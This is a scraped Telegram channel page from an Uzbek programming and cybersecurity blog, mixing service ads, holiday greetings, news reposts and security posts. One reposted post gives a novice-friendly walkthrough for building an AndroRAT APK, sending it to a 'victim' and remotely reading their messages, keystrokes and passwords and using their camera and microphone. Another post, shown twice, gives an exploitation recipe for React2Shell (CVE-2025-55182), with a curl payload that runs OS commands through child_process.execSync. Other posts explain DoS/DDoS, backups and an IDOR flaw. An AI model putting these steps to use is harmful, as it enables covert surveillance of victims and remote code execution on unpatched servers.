en
Feedback
Ozodbek Zayniddinov | IT Blog

Ozodbek Zayniddinov | IT Blog

Open in Telegram

Dasturlash | Kiberxavfsizlik | Shaxsiy blog ............................................................................. Build Break Secure @ozodbekdev | @dasturchichoyxonasi

Show more
407
Subscribers
-124 hours
-87 days
-2030 days
Posts Archive
✅Web-sayt va Telegram bot — biznesingiz uchun zamonaviy yechimlar! 🕵‍♂ Fullstack dasturchi sifatida quyidagi xizmatlarimni taklif qilaman
🌐 Web-saytlar – tezkor, zamonaviy, mobil qurilmalarga mos va brendingizga mos dizayn bilan.
🤖 Telegram botlar – buyurtma, to‘lov, mijozlar bilan aloqa kabi jarayonlarni avtomatlashtirish imkoniyati.
💡 Nega bu muhim?
✅Biznesingiz raqamli maydonga chiqadi
🔎Mijozlar bilan aloqa yengillashadi
🖥Ish jarayonlari optimallashtiriladi
👤Imidjingiz va ishonchingiz ortadi
📈Sotuvlar va daromad o‘sadi
👨‍💼 Har bir loyiha individual yondashuv bilan ishlab chiqiladi — sizning maqsadingiz biz uchun ustuvor!
✉️ Bog‘lanish: @ozodbek_o4_o5 | +998932426002
🚀 Zamonaviy texnologiyalar – sizning rivojlanishingiz uchun xizmat qiladi

Repost from CyberDevs
👁 AndroRAT nima? Bu – sizga boshqa odamning telefonini masofadan boshqarish imkonini beradigan dastur. Ya’ni siz o‘z kompyuteringizda o‘tirib, qurbonning telefonidagi hamma narsani ko‘rasiz va boshqarasiz. --- Nimalarni qila oladi? - Telefon qayerda turganini ko‘rsatadi 📍 - Mikrofonni yoqib, atrofdagi ovozlarni eshitasiz 🎙 - Kamera bilan surat olish mumkin 📸 - Xabarlar, kontaktlar, qo‘ng‘iroqlar ro‘yxati sizda bo‘ladi ✍️ - Telefonga fayl yuklash yoki undan fayl olib ketish mumkin 📂 - Klaviaturada nima yozilganini ko‘rasiz (parollar ham) key ⌨️ - Telefonni bloklash, ovoz chiqarish, titratish mumkin ⛔️ --- Qanday ishlatiladi? (hech narsa bilmagan uchun ham tushunarli) 1. Kompyuterga server dasturini yuklab oling (bu AndroRAT ning boshqaruv paneli). 2. Serverda sozlamalarni kiriting: - O‘z IP manzilingizni yozing (qurbon telefoni sizga ulanishi uchun). - Kerakli funksiyalarni belgilang (masalan, kamerani yoqish, xabarlarni o‘qish). 3. Bir tugma bilan APK fayl yasang (bu dastur telefonga o‘rnatiladi). 4. Shu APK faylni qurbonga yuboring (Telegram, WhatsApp, har qanday usul). 5. Qurbon uni o‘rnatishi kerak. *O‘rnatish uchun telefonda “Noma’lum manbalar” ruxsatini yoqish talab qilinadi.* 6. Qurbon dasturni ochgan zahoti sizning kompyuteringizda telefon paydo bo‘ladi. 7. Endi sichqoncha bilan bosib, istalgan buyruq bering: kamera, mikrofon, fayl olish – hammasi bir-ikki sekundda ishlaydi. --- 👮‍♀ Keyingi mavzu nima haqida bo'lsin?

Ko'pchiligimiz bilamiz DoS,  DDoS hujumlar nima ekanligi va qanday vazifa bajarishini. Lekin ko'pchilik adashadigan qism bu ikkalasini farqi nimada? Aksariyat sohaga yangi kirganlar ikkisini bir narsa deb o'ylashadi, ammo bunday emas — nomi o‘xshash, lekin darajasi va ta’siri jihatidan ancha farq qiladi. Batafsilroq tushuntiradigan bo'lsam: DoS (Denial of Service) — bu bitta manbadan amalga oshiriladigan hujum. Oddiy qilib aytganda, bitta qurilma serverga juda ko‘p so‘rov yuboradi va uni ortiqcha yuklab qo‘yadi. Natijada server javob bera olmay qoladi yoki butunlay ishlamaydi. Bunday hujumni aniqlash va bloklash nisbatan oson — odatda bitta IP manzilni yopish yetarli bo‘ladi. DDoS (Distributed Denial of Service) esa ancha murakkab. Bu yerda hujum bitta emas, balki minglab yoki hatto millionlab qurilmalardan bir vaqtda amalga oshiriladi. Ko‘pincha bu qurilmalar botnet bo‘ladi, ya’ni oldindan zararlangan kompyuterlar yoki IoT qurilmalar. Har biri alohida so‘rov yuboradi, lekin umumiy bosim serverni yiqitadi. Asosiy farq — DoS bitta nuqtadan keladi, DDoS esa tarqatilgan. Shu sababli DDoS’ni aniqlash ham, himoyalanish ham ancha qiyin. IP bloklash bu yerda deyarli foyda bermaydi.
@uzcodingblog

Erkaklar oʻzi begʻubor mavjudotlar 🎩
Erkaklar oʻzi begʻubor mavjudotlar 🎩

🌙Ramazon Hayiti muborak bo‘lsin!

Backup nima va nima uchun muhim?
Dasturchi sifatida eng katta xatolardan biri — ma’lumotlarga haddan tashqari ishonib qo‘yish. Hammasi joyida ishlayotgandek tuyuladi, lekin bitta xatolik, serverdagi nosozlik yoki oddiygina noto‘g‘ri o‘chirish butun loyihani yo‘qqa chiqarishi mumkin. Backup aynan shunday vaziyatlar uchun kerak. Bu — ma’lumotlarning zaxira nusxasi bo‘lib, kerak bo‘lganda tizimni oldingi holatiga qaytarish imkonini beradi. Ayniqsa production tizimlarda backup yo‘qligi katta xavf hisoblanadi. Ko‘pincha muammo yuz bergandan keyin backup haqida o‘ylay boshlashadi. Aslida esa bu oldindan yo‘lga qo‘yilishi kerak bo‘lgan jarayon. Oddiy qilib aytganda, backup — bu sizning “plan B”ingiz. Yaxshi yondashuv esa juda murakkab emas: muntazam backup olish, uni bir nechta joyda saqlash va vaqti-vaqti bilan tiklab ko‘rish. Shunda siz kutilmagan holatlarda ham xotirjam ishlay olasiz Backup qilinmagan loyiha — bu har doim xavf ostidagi loyiha.
@uzcodingblog

MINOR - SUKUNAT 1, 2, 3, 4.mp338.78 MB

Story

ESP8266 (ESP-12F)

Video message00:41

Foydalanish: Ushbu zaiflikdan faqat React oʻrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com
Foydalanilgan texnologiyalar orasida React mavjud boʻlsa bu serverda React2Shell zaifligi boʻlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'  
Bu orqali server terminalida whois buyrugʻini berdik va javob ubuntu tarzida chiqadi
@uzcodingblog

Foydalanish: Ushbu zaiflikdan faqat React oʻrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
```shell wappalyzer https://example.com
Foydalanilgan texnologiyalar orasida React mavjud boʻlsa bu serverda React2Shell zaifligi boʻlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
shell curl -s -X POST http://example.com:4000/api/rsc/render \ -H "Content-Type: application/json" \ -d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'` Bu orqali server terminalida whois buyrugʻini berdik va javob ubuntu tarzida chiqadi

React2Shell (CVE-2025-55182)
Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi. Muammo RSC “Flight protocol” maʼlumotlarini notoʻgʻri qayta ishlash bilan bogʻliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. 15million aholi malumotlari aynan shu zaiflik asosida olingani taxmin qilinadi
- CVE: CVE-2025-55182 - Nom: React2Shell - Turi: Remote Code Execution (RCE) - Taʼsir qiluvchi texnologiyalar: React Server Components, Next.js App Router - CVSS bahosi: 9.8 – 10.0 (Critical)

Repost from UzCERT Live
⚠️ Google Chrome’da aniqlangan yangi “Zero-Day” zaifliklar: foydalanuvchilarga zudlik bilan yangilanish o‘rnatish tavsiya eti
⚠️ Google Chrome’da aniqlangan yangi “Zero-Day” zaifliklar: foydalanuvchilarga zudlik bilan yangilanish o‘rnatish tavsiya etiladi 📱 Google kompaniyasi o‘zining mashhur brauzeri — Google Chrome uchun favqulodda xavfsizlik yangilanishini e’lon qildi. Sababi — brauzerda aniqlangan ikki muhim zero-day zaiflik allaqachon real kiberhujumlarda faol qo‘llanilayotgani tasdiqlangan. 💻 Mutaxassislarning ma’lumotiga ko‘ra, ushbu zaifliklar yordamida hujumchilar foydalanuvchi tizimida zararli kodni ishga tushirishi, brauzer xavfsizlik mexanizmlarini chetlab o‘tishi hamda qurilma ustidan nazoratni qo‘lga kiritishi mumkin. ✅ Mazkur tahdidni bartaraf etish maqsadida Chrome brauzerining 146.0.7680.75/76 versiyasi Windows va macOS tizimlari uchun, 146.0.7680.75 versiyasi esa Linux uchun chiqarildi. Yangilanish bosqichma-bosqich tarzda butun dunyo foydalanuvchilariga yetkazilmoqda. 📱 Batafsil #Google #Chrome #Windows #macOS #Linux #zaiflik 🚀 UZCERT xizmatining rasmiy telegram sahifasiga a’zo bo‘ling!

8 mart - Xalqaro xotin-qizlar kuni Yurtimizning muhtaram va aziz ayollari!
Sizlarni 8 mart — Xalqaro xotin-qizlar bayrami bilan tabriklayman Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning o‘rni beqiyosdir. Sizlar o‘zingizning fidokorona mehnatingiz, yuksak mas’uliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qo‘shib kelmoqdasiz. Shu fayzli bahor ayyomida sizlarga mustahkam sog‘liq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, mas’uliyatli faoliyatingizda ulkan yutuqlar tilayman!
@ozodbekdevv

🇰🇵🇺🇸🇮🇱🇮🇷 Икки ядровий қуролга эга давлат ядровий иншоотларга эга бўлиш баҳонасида бошқа давлатга ҳужум қилмоқда. Мени
🇰🇵🇺🇸🇮🇱🇮🇷 Икки ядровий қуролга эга давлат ядровий иншоотларга эга бўлиш баҳонасида бошқа давлатга ҳужум қилмоқда. Менинг ҳам ядровий иншоотларим бор, нега ҳеч ким менинг олдимга келмайди - Шимолий Корея етакчиси Ким Чен Ин 👉 https://t.me/UZBEKISTANOFFICIAL

https://t.me/uzcodingblog/556?comment=5752 ZAIFLIK TOPILDI
Qanday ishladi? Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz. Xato qayerda? Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.